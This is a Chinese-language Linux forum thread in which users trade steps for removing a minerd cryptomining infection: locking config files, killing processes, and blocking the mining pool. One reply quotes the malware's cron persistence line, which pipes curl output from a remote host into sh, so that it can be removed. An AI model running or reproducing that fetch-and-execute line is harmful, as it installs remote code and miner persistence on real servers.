免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
12下一页
最近访问板块 发新帖
查看: 11298 | 回复: 12
打印 上一主题 下一主题

[系统管理] 服务器被入侵,做了minerd挖矿机了,清理不掉,求大神 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2016-07-13 17:44 |只看该作者 |倒序浏览
Linux 服务器被入侵植入了 /opt/minerd 程序,被当做挖矿肉鸡了。在网上找的方法都不管用,清除掉cron 里面的任务,  crontab -l  已经 no crontab for root 了,并停止 crond 服务了,删除掉系统里面全部名字包含  miner 的文件,然后杀掉 minerd 进程,删掉 /opt/minerd 文件,进程还是会几分钟后就自动启动起来。
求大神支招!! 拜谢

论坛徽章:
0
2 [报告]
发表于 2016-07-13 18:07 |只看该作者
系统里面自动生成一个 /usr/local/etc/minerd.conf   文件,内容是登陆到目标地址的配置,把里面内容改掉了。 然后进程会自动重启,还是显示原来的内容。删掉这文件也不管用。

论坛徽章:
33
ChinaUnix元老
日期:2015-02-02 08:55:39CU十四周年纪念徽章
日期:2019-08-20 08:30:3720周年集字徽章-周	
日期:2020-10-28 14:13:3020周年集字徽章-20	
日期:2020-10-28 14:04:3019周年集字徽章-CU
日期:2019-09-08 23:26:2519周年集字徽章-19
日期:2019-08-27 13:31:262016科比退役纪念章
日期:2022-04-24 14:33:24
3 [报告]
发表于 2016-07-13 21:34 |只看该作者
  1. cd /usr/local/etc/
  2. :>minerd.conf
  3. chmod 000 minerd.conf
  4. chattr +i minerd.conf
复制代码

论坛徽章:
0
4 [报告]
发表于 2016-07-14 11:54 |只看该作者
回复 3# Shell_HAT

方法不错。这个可以让木马程序不往对端发送消息了。但自身 /opt/minerd  程序还是在运行,在消耗大量CPU资源。
能否还有啥办法可以彻底清除这个木马呢
   

论坛徽章:
33
ChinaUnix元老
日期:2015-02-02 08:55:39CU十四周年纪念徽章
日期:2019-08-20 08:30:3720周年集字徽章-周	
日期:2020-10-28 14:13:3020周年集字徽章-20	
日期:2020-10-28 14:04:3019周年集字徽章-CU
日期:2019-09-08 23:26:2519周年集字徽章-19
日期:2019-08-27 13:31:262016科比退役纪念章
日期:2022-04-24 14:33:24
5 [报告]
发表于 2016-07-14 12:43 |只看该作者
回复 4# tabtty
  1. cd /opt/
  2. killall minerd
  3. :>minerd
  4. chmod 000 minerd
  5. chattr +i minerd
复制代码

论坛徽章:
0
6 [报告]
发表于 2016-07-16 19:19 |只看该作者
服务器受到同样的攻击了,有彻底解决的方法吗

论坛徽章:
6
15-16赛季CBA联赛之新疆
日期:2016-03-22 22:34:5915-16赛季CBA联赛之山东
日期:2016-04-11 09:08:41程序设计版块每日发帖之星
日期:2016-06-28 06:20:00程序设计版块每日发帖之星
日期:2016-07-19 06:20:00每日论坛发贴之星
日期:2016-07-19 06:20:0015-16赛季CBA联赛之青岛
日期:2016-07-20 22:44:17
7 [报告]
发表于 2016-07-16 21:36 |只看该作者
本帖最后由 RE_HASH 于 2016-07-16 21:37 编辑

外面的帖子:
I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -

On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
Removed the directory /opt/yam.
Removed /root/.ssh/KHK75NEOiq.
Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
Stopped the minerd process - pkill minerd.
Stopped lady - service lady stop.
I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

I still need to figure out how it gained access into the system but I was able to disable it this way.

论坛徽章:
6
15-16赛季CBA联赛之新疆
日期:2016-03-22 22:34:5915-16赛季CBA联赛之山东
日期:2016-04-11 09:08:41程序设计版块每日发帖之星
日期:2016-06-28 06:20:00程序设计版块每日发帖之星
日期:2016-07-19 06:20:00每日论坛发贴之星
日期:2016-07-19 06:20:0015-16赛季CBA联赛之青岛
日期:2016-07-20 22:44:17
8 [报告]
发表于 2016-07-16 21:41 |只看该作者
系统安全是问题,删掉了病毒可漏洞还在。清查一下有啥老版本的软件,WordPress之类的。

论坛徽章:
0
9 [报告]
发表于 2016-07-16 21:52 |只看该作者
回复 8# RE_HASH


    没有lady这个服务

论坛徽章:
6
15-16赛季CBA联赛之新疆
日期:2016-03-22 22:34:5915-16赛季CBA联赛之山东
日期:2016-04-11 09:08:41程序设计版块每日发帖之星
日期:2016-06-28 06:20:00程序设计版块每日发帖之星
日期:2016-07-19 06:20:00每日论坛发贴之星
日期:2016-07-19 06:20:0015-16赛季CBA联赛之青岛
日期:2016-07-20 22:44:17
10 [报告]
发表于 2016-07-16 22:26 |只看该作者
看看有没有别的怪模怪样的service
service --status-all

原帖:
http:....//security.stackexchange.com/questions/129448/how-can-i-kill-minerd-malware-on-an-aws-ec2-instance
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP